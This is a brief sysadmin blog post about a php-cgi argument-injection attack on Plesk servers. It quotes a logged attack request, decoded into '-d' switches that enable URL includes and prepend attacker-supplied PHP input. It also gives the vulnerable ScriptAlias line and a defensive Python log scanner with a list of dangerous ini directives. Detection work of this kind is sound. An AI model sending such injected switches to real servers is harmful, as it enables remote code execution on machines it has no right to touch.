
Apache/Plesk php Exploit

While reviewing web server logs recently, I spotted the following attack…

216.237.113.27 - - [07/Aug/2013:08:12:14 -0400] "POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
404 209 "-" "-"

Which decodes to:

/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions="" -d
open_basedir=none -d auto_prepend_file=php://input -n

Googling turned up a few relevant results suggesting this is an attack on Plesk, a commercial web hosting automation product. Parallels, the company that owns Plesk, published a knowledge base article on the vulnerability describing how to determine whether a deployment is vulnerable and how to patch the system.

One trait of a vulnerable deployment is an Apache configuration that maps a URL path directly onto the system binary directory with the following ScriptAlias directive, which lets a request for /phppath/php reach the php-cgi binary and hand it the decoded query string as command-line options:

ScriptAlias /phppath/ "/usr/bin/"

If you run Plesk, or any other system with the above configuration, patch it accordingly. Check the references below for more detailed information regarding this vulnerability.
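As an added example (not part of the original post), the following Python scanner decodes request targets the way shown above and flags the two traits of this attack: php-cgi switches smuggled through an argv-style query string (one containing no unencoded "="), and requests aimed at the /phppath/ ScriptAlias. The sample log lines, their source IPs and the directive list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample log (Apache combined format). The first request is the one
# from the post re-joined onto one line; the source IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2013:08:12:14 -0400] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 209 "-" "-"
203.0.113.9 - - [07/Aug/2013:08:13:02 -0400] "GET /index.php?page=home&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# php-cgi switches used in the decoded request: -d sets an ini value, -n skips php.ini
CGI_SWITCHES = {"-d", "-n"}
# ini directives that only an attacker has reason to set from a query string (constructed list)
DANGEROUS_INI = ("allow_url_include", "auto_prepend_file", "safe_mode",
                 "disable_functions", "open_basedir", "suhosin.simulation")

def analyse_target(target):
    """Decode one request target; return (decoded_string, list_of_reasons)."""
    path, _, query = target.partition("?")
    # RFC 3875 4.4: a query string with no unencoded '=' is split on '+' and handed
    # to the CGI program as argv; encoding '=' as %3D is what smuggles key=value in.
    argv = [unquote(a) for a in query.split("+")] if query and "=" not in query else []
    decoded = unquote(path) + (" " + " ".join(argv) if argv else
                               ("?" + unquote(query) if query else ""))
    reasons = []
    if any(a in CGI_SWITCHES for a in argv):
        reasons.append("php-cgi switches passed via argv-style query string")
    if any(a.split("=")[0] in DANGEROUS_INI for a in argv):
        reasons.append("ini directive override in query string")
    if unquote(path).startswith("/phppath/"):
        reasons.append("request to ScriptAlias'd /phppath/")
    return decoded, reasons

def scan_log(text):
    """Return [(ip, status, decoded_target, reasons)] for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded, reasons = analyse_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("status"), decoded, reasons))
    return hits
```

A 404 on such a request, as in the log above, means the alias was not present and the attempt failed; a 200 with the same decoded target is the line to escalate.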

References

Disclaimer

This blog is posted for informational purposes only. Extensive testing is recommended prior to implementing changes discussed here.

Categories: Technical Miscellany